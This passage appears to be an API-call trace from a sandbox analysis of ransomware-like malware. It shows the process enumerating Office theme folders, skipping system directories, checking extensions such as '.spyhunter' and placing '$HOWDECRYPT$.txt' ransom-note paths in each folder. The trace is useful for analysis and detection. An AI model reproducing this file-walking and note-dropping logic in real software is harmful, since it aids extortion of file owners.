(lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 78 [0090.687] GetProcessHeap () returned 0x2c0000 [0090.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3807e8 [0090.687] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11e8) returned 0x3824f8 [0090.687] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.687] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.688] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\$HOWDECRYPT$.txt") returned 82 [0090.688] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\$HOWDECRYPT$.txt") returned 82 [0090.688] GetProcessHeap () returned 0x2c0000 [0090.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x341690 [0090.688] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11f0) returned 0x3824f8 [0090.688] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.688] lstrcmpiW (lpString1="PROFILE", lpString2="Windows") returned -1 [0090.688] lstrlenW (lpString="Windows") returned 7 [0090.688] lstrcmpiW (lpString1="PROFILE", lpString2="$Recycle.bin") returned 1 [0090.688] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.688] lstrcmpiW (lpString1="PROFILE", lpString2="System Volume Information") returned -1 [0090.688] lstrlenW (lpString="System Volume Information") returned 25 [0090.688] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE") returned 67 [0090.688] lstrcmpW (lpString1="PROFILE", lpString2=".") returned 1 [0090.688] lstrcmpW (lpString1="PROFILE", lpString2="..") returned 1 [0090.688] GetProcessHeap () returned 0x2c0000 [0090.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.688] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*") returned 69 [0090.688] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.689] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.689] lstrlenW (lpString="Windows") returned 7 [0090.689] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.689] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.689] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.689] lstrlenW (lpString="System Volume Information") returned 25 [0090.689] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\.") returned 69 [0090.689] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.689] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.689] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.689] lstrlenW (lpString="Windows") returned 7 [0090.689] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.689] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.689] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.689] lstrlenW (lpString="System Volume Information") returned 25 [0090.689] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\..") returned 70 [0090.689] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.689] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.689] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.689] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.689] lstrlenW (lpString="Windows") returned 7 [0090.689] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.689] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.689] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.689] lstrlenW (lpString="System Volume Information") returned 25 [0090.689] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 79 [0090.689] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.690] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.690] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.690] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 79 [0090.690] GetProcessHeap () returned 0x2c0000 [0090.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3808d0 [0090.690] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11f8) returned 0x3824f8 [0090.690] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.690] lstrcmpiW (lpString1="PROFILE.ELM", lpString2="Windows") returned -1 [0090.690] lstrlenW (lpString="Windows") returned 7 [0090.690] lstrcmpiW (lpString1="PROFILE.ELM", lpString2="$Recycle.bin") returned 1 [0090.690] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.690] lstrcmpiW (lpString1="PROFILE.ELM", lpString2="System Volume Information") returned -1 [0090.690] lstrlenW (lpString="System Volume Information") returned 25 [0090.690] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM") returned 79 [0090.690] StrStrIW (lpFirst="PROFILE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.690] lstrcmpW (lpString1="PROFILE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.690] lstrcmpW (lpString1="PROFILE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.690] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM") returned 79 [0090.690] GetProcessHeap () returned 0x2c0000 [0090.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3809b8 [0090.690] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1200) returned 0x3824f8 [0090.690] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.690] lstrcmpiW (lpString1="PROFILE.INF", lpString2="Windows") returned -1 [0090.690] lstrlenW (lpString="Windows") returned 7 [0090.691] lstrcmpiW (lpString1="PROFILE.INF", lpString2="$Recycle.bin") returned 1 [0090.691] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.691] lstrcmpiW (lpString1="PROFILE.INF", lpString2="System Volume Information") returned -1 [0090.691] lstrlenW (lpString="System Volume Information") returned 25 [0090.691] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF") returned 79 [0090.691] StrStrIW (lpFirst="PROFILE.INF", lpSrch=".spyhunter") returned 0x0 [0090.691] lstrcmpW (lpString1="PROFILE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.691] lstrcmpW (lpString1="PROFILE.INF", lpString2="_uninstalling_.png") returned 1 [0090.691] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF") returned 79 [0090.691] GetProcessHeap () returned 0x2c0000 [0090.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x380aa0 [0090.691] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1208) returned 0x3824f8 [0090.691] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.691] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.691] lstrlenW (lpString="Windows") returned 7 [0090.691] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.691] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.691] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.691] lstrlenW (lpString="System Volume Information") returned 25 [0090.691] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 80 [0090.691] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.691] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.691] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.691] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 80 [0090.691] GetProcessHeap () returned 0x2c0000 [0090.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x341780 [0090.692] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1210) returned 0x3824f8 [0090.692] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.692] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.692] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\$HOWDECRYPT$.txt") returned 84 [0090.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\$HOWDECRYPT$.txt") returned 84 [0090.692] GetProcessHeap () returned 0x2c0000 [0090.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354de0 [0090.692] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1218) returned 0x3824f8 [0090.692] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.692] lstrcmpiW (lpString1="QUAD", lpString2="Windows") returned -1 [0090.692] lstrlenW (lpString="Windows") returned 7 [0090.692] lstrcmpiW (lpString1="QUAD", lpString2="$Recycle.bin") returned 1 [0090.692] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.692] lstrcmpiW (lpString1="QUAD", lpString2="System Volume Information") returned -1 [0090.692] lstrlenW (lpString="System Volume Information") returned 25 [0090.692] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD") returned 64 [0090.692] lstrcmpW (lpString1="QUAD", lpString2=".") returned 1 [0090.692] lstrcmpW (lpString1="QUAD", lpString2="..") returned 1 [0090.692] GetProcessHeap () returned 0x2c0000 [0090.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.692] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*") returned 66 [0090.692] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.700] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.700] lstrlenW (lpString="Windows") returned 7 [0090.700] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.700] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.700] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.700] lstrlenW (lpString="System Volume Information") returned 25 [0090.700] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\.") returned 66 [0090.700] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.700] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.700] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.700] lstrlenW (lpString="Windows") returned 7 [0090.700] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.700] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.700] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.700] lstrlenW (lpString="System Volume Information") returned 25 [0090.700] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\..") returned 67 [0090.700] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.700] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.700] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.700] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.700] lstrlenW (lpString="Windows") returned 7 [0090.700] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.701] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.701] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.701] lstrlenW (lpString="System Volume Information") returned 25 [0090.701] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 76 [0090.701] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.701] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.701] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 76 [0090.701] GetProcessHeap () returned 0x2c0000 [0090.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x380b88 [0090.701] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1220) returned 0x3824f8 [0090.701] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.701] lstrcmpiW (lpString1="QUAD.ELM", lpString2="Windows") returned -1 [0090.701] lstrlenW (lpString="Windows") returned 7 [0090.701] lstrcmpiW (lpString1="QUAD.ELM", lpString2="$Recycle.bin") returned 1 [0090.701] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.701] lstrcmpiW (lpString1="QUAD.ELM", lpString2="System Volume Information") returned -1 [0090.701] lstrlenW (lpString="System Volume Information") returned 25 [0090.701] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM") returned 73 [0090.701] StrStrIW (lpFirst="QUAD.ELM", lpSrch=".spyhunter") returned 0x0 [0090.701] lstrcmpW (lpString1="QUAD.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.701] lstrcmpW (lpString1="QUAD.ELM", lpString2="_uninstalling_.png") returned 1 [0090.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM") returned 73 [0090.701] GetProcessHeap () returned 0x2c0000 [0090.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x345bc8 [0090.702] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1228) returned 0x3824f8 [0090.702] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.702] lstrcmpiW (lpString1="QUAD.INF", lpString2="Windows") returned -1 [0090.702] lstrlenW (lpString="Windows") returned 7 [0090.702] lstrcmpiW (lpString1="QUAD.INF", lpString2="$Recycle.bin") returned 1 [0090.702] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.702] lstrcmpiW (lpString1="QUAD.INF", lpString2="System Volume Information") returned -1 [0090.702] lstrlenW (lpString="System Volume Information") returned 25 [0090.702] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF") returned 73 [0090.702] StrStrIW (lpFirst="QUAD.INF", lpSrch=".spyhunter") returned 0x0 [0090.702] lstrcmpW (lpString1="QUAD.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.702] lstrcmpW (lpString1="QUAD.INF", lpString2="_uninstalling_.png") returned 1 [0090.702] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.INF") returned 73 [0090.702] GetProcessHeap () returned 0x2c0000 [0090.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x345ca8 [0090.702] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1230) returned 0x3824f8 [0090.702] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.702] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.702] lstrlenW (lpString="Windows") returned 7 [0090.702] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.702] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.702] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.702] lstrlenW (lpString="System Volume Information") returned 25 [0090.702] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 77 [0090.703] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.703] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.703] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.703] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 77 [0090.703] GetProcessHeap () returned 0x2c0000 [0090.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x380c70 [0090.703] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1238) returned 0x3824f8 [0090.703] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.703] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.703] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\$HOWDECRYPT$.txt") returned 81 [0090.703] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\$HOWDECRYPT$.txt") returned 81 [0090.703] GetProcessHeap () returned 0x2c0000 [0090.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x341870 [0090.703] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1240) returned 0x3824f8 [0090.703] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.703] lstrcmpiW (lpString1="RADIAL", lpString2="Windows") returned -1 [0090.703] lstrlenW (lpString="Windows") returned 7 [0090.703] lstrcmpiW (lpString1="RADIAL", lpString2="$Recycle.bin") returned 1 [0090.703] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.703] lstrcmpiW (lpString1="RADIAL", lpString2="System Volume Information") returned -1 [0090.703] lstrlenW (lpString="System Volume Information") returned 25 [0090.703] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL") returned 66 [0090.704] lstrcmpW (lpString1="RADIAL", lpString2=".") returned 1 [0090.704] lstrcmpW (lpString1="RADIAL", lpString2="..") returned 1 [0090.704] GetProcessHeap () returned 0x2c0000 [0090.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.704] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*") returned 68 [0090.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.756] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.756] lstrlenW (lpString="Windows") returned 7 [0090.756] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.756] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.756] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.756] lstrlenW (lpString="System Volume Information") returned 25 [0090.756] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\.") returned 68 [0090.756] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.756] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.756] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.756] lstrlenW (lpString="Windows") returned 7 [0090.756] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.757] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.757] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.757] lstrlenW (lpString="System Volume Information") returned 25 [0090.757] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\..") returned 69 [0090.757] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.757] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.757] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.757] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.757] lstrlenW (lpString="Windows") returned 7 [0090.757] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.757] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.757] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.757] lstrlenW (lpString="System Volume Information") returned 25 [0090.757] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 78 [0090.757] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.757] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.757] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.757] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 78 [0090.757] GetProcessHeap () returned 0x2c0000 [0090.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x380d58 [0090.757] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1248) returned 0x3824f8 [0090.757] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.758] lstrcmpiW (lpString1="RADIAL.ELM", lpString2="Windows") returned -1 [0090.758] lstrlenW (lpString="Windows") returned 7 [0090.758] lstrcmpiW (lpString1="RADIAL.ELM", lpString2="$Recycle.bin") returned 1 [0090.758] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.758] lstrcmpiW (lpString1="RADIAL.ELM", lpString2="System Volume Information") returned -1 [0090.758] lstrlenW (lpString="System Volume Information") returned 25 [0090.758] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM") returned 77 [0090.758] StrStrIW (lpFirst="RADIAL.ELM", lpSrch=".spyhunter") returned 0x0 [0090.758] lstrcmpW (lpString1="RADIAL.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.758] lstrcmpW (lpString1="RADIAL.ELM", lpString2="_uninstalling_.png") returned 1 [0090.758] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM") returned 77 [0090.758] GetProcessHeap () returned 0x2c0000 [0090.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x380e40 [0090.758] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1250) returned 0x3824f8 [0090.759] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.759] lstrcmpiW (lpString1="RADIAL.INF", lpString2="Windows") returned -1 [0090.759] lstrlenW (lpString="Windows") returned 7 [0090.759] lstrcmpiW (lpString1="RADIAL.INF", lpString2="$Recycle.bin") returned 1 [0090.759] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.759] lstrcmpiW (lpString1="RADIAL.INF", lpString2="System Volume Information") returned -1 [0090.759] lstrlenW (lpString="System Volume Information") returned 25 [0090.759] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF") returned 77 [0090.759] StrStrIW (lpFirst="RADIAL.INF", lpSrch=".spyhunter") returned 0x0 [0090.759] lstrcmpW (lpString1="RADIAL.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.759] lstrcmpW (lpString1="RADIAL.INF", lpString2="_uninstalling_.png") returned 1 [0090.759] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF") returned 77 [0090.759] GetProcessHeap () returned 0x2c0000 [0090.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x380f28 [0090.759] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1258) 